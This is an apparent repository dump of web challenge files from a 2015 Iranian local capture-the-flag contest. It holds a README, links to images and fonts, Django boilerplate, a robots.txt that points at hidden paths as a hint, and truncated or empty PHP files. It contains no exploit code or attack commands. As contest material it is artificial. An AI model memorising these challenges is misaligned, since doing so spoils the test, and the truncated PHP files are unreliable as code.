/Challenges/IRAN Cert/2015/README.md:
--------------------------------------------------------------------------------
1 | APA-IUTcert CTF:
2 | --
3 | Third CTF held by APA-IUTcert... it was a local ctf for just iranian users & they could access to portal and challenges only by using proxy.
4 |
5 | CTF was held for 15 hours
6 |
7 | This direcotry contains solutions/sources codes of Web challenges(cause i was in charge of them)
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/accesslog/access.log.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/accesslog/access.log.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/helloadmin/sourcefiles/logout.php:
--------------------------------------------------------------------------------
1 | $value )
7 | {
8 | setcookie( $key, $value, $past, '/' );
9 | }
10 | header("Location: login.php");//use for the redirection to some page
11 | ?>
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/hijacked.pcap.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/hijacked.pcap.pcapng
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/1.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/10.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/11.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/12.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/2.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/3.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/4.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/5.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/6.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/7.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/8.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/images/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/9.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/logout.php:
--------------------------------------------------------------------------------
1 | $value )
7 | {
8 | setcookie( $key, $value, $past, '/' );
9 | }
10 | header("Location: login.php");//use for the redirection to some page
11 | ?>
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/robots.txt:
--------------------------------------------------------------------------------
1 | User-agent: *
2 | Allow: /login.php
3 | Allow: /register.php
4 | Allow: /css/
5 | Allow: /js/
6 | Allow: /fonts/
7 | Disallow: /defcon/
8 | Disallow: /private/create_session.php
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/stuff/rand.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/hijacked/sourcefiles/stuff/salt.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import os
3 | import sys
4 |
5 | if __name__ == "__main__":
6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "maze.settings")
7 |
8 | from django.core.management import execute_from_command_line
9 |
10 | execute_from_command_line(sys.argv)
11 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/settings.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/wsgi.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/wsgi.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.py:
--------------------------------------------------------------------------------
1 | __author__ = 'Execut3'
2 | from django import forms
3 |
4 | class SessionForm(forms.Form):
5 | username = forms.CharField(widget=forms.TextInput(attrs={'size':'48', 'class':'form-control','placeholder':'username here'}),label='')
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg_rtl.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg_rtl.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg-reverse.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg-reverse.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/deleted-overlay.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/deleted-overlay.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_off.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_off.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_on.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_on.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-no.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-no.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-unknown.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-unknown.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-yes.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-yes.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_addlink.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_addlink.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_alert.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_alert.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_calendar.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_calendar.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_changelink.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_changelink.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_clock.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_clock.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_deletelink.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_deletelink.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_error.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_error.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_searchbox.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_searchbox.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_success.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_success.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete-8bit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete-8bit.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore-8bit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore-8bit.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-splitter-bg.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-splitter-bg.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-grabber.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-grabber.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-reverse.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-reverse.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-selected.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-selected.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-icons.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-icons.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-search.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-search.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/sorting-icons.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/sorting-icons.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-add.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-add.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-arrowright.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-arrowright.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/icon.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/icon.gif
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/logout.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide2.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide3.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide4.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide5.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide6.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide7.jpg:
--------------------------------------------------------------------------------
